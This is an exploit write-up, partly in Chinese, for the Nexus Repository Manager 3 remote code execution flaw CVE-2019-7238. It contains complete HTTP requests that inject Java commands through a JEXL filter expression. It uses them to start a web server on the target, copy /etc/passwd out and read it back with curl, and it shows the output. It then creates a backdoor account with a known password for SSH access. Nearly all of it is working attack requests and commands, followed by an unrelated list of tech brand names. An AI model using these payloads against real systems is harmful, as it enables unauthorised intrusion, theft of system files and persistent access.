CVE-2019-7238 Nexus Repository Manager RCE
Nexus Repository Manager 3 Remote Code Execution without authentication < 3.15.0
Ps: 关于命令执行回显,很多时候攻击者可以访问目标主机,但目标主机不能反弹shell到攻击者;
思路:可以开启一个web服务,将要执行的命令写入到网站目录下面,然后读取文件,得到命令回显内容
0x01 python web for Nexus
setsid python -m SimpleHTTPServer 8987
POST /service/extdirect HTTP/1.1
Host: 10.10.20.166:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Nexus-UI: true
NX-ANTI-CSRF-TOKEN: 00045277-54c3-47bd-831b-b056a3a8e3ab
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Referer: http://10.10.20.166:8081/
Content-Length: 428
Cookie: sidebar_collapsed=false; NX-ANTI-CSRF-TOKEN=00045277-54c3-47bd-831b-b056a3a8e3ab; _ga=GA1.4.915076148.1558341613; NXSESSIONID=df711f34-689b-49dc-8e53-288352ad2329; _gid=GA1.4.813394406.1558444836; _gat=1; _gat_adw=1; _gat_cdt=1; _gat_UA-1693297-38=1
X-Forwarded-For: 127.0.0.1
Connection: keep-alive
{"type": "rpc", "method": "previewAssets", "tid": 18, "data": [{"limit": 50, "sort": [{"property": "name", "direction": "ASC"}], "page": 1, "filter": [{"value": "*", "property": "repositoryName"}, {"value": "1==0 or ''.class.forName('java.lang.Runtime').getRuntime().exec(\"setsid python -m SimpleHTTPServer 8987\")", "property": "expression"}, {"value": "jexl", "property": "type"}], "start": 0}], "action": "coreui_Component"}
0x02 get the passwd
cp /etc/passwd ./
POST /service/extdirect HTTP/1.1
Host: 10.10.20.166:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Nexus-UI: true
NX-ANTI-CSRF-TOKEN: 00045277-54c3-47bd-831b-b056a3a8e3ab
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Referer: http://10.10.20.166:8081/
Content-Length: 407
Cookie: sidebar_collapsed=false; NX-ANTI-CSRF-TOKEN=00045277-54c3-47bd-831b-b056a3a8e3ab; _ga=GA1.4.915076148.1558341613; NXSESSIONID=df711f34-689b-49dc-8e53-288352ad2329; _gid=GA1.4.813394406.1558444836; _gat=1; _gat_adw=1; _gat_cdt=1; _gat_UA-1693297-38=1
X-Forwarded-For: 127.0.0.1
Connection: keep-alive
{"type": "rpc", "method": "previewAssets", "tid": 18, "data": [{"limit": 50, "sort": [{"property": "name", "direction": "ASC"}], "page": 1, "filter": [{"value": "*", "property": "repositoryName"}, {"value": "1==0 or ''.class.forName('java.lang.Runtime').getRuntime().exec(\"cp /etc/passwd ./\")", "property": "expression"}, {"value": "jexl", "property": "type"}], "start": 0}], "action": "coreui_Component"}
root@hz ~ curl http://10.10.20.166:8987/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
nexus:x:200:200:Nexus Repository Manager user:/opt/sonatype/nexus:/bin/false
0x03 command see
usage: python CVE-2019-7238.py cmd
0x04 login ssh
用echo命令修改用户密码(root 权限)
useradd pentest
echo password | passwd --stdin pentest
ssh username: pentest
ssh password: password
ssh [email protected]
Connecting to 10.10.20.166:22...
Connection established.
To escape to local shell, press Ctrl+Alt+].
React
Typescript
Django
Laravel
Facebook
Microsoft
Google
Alibaba
D3
Tencent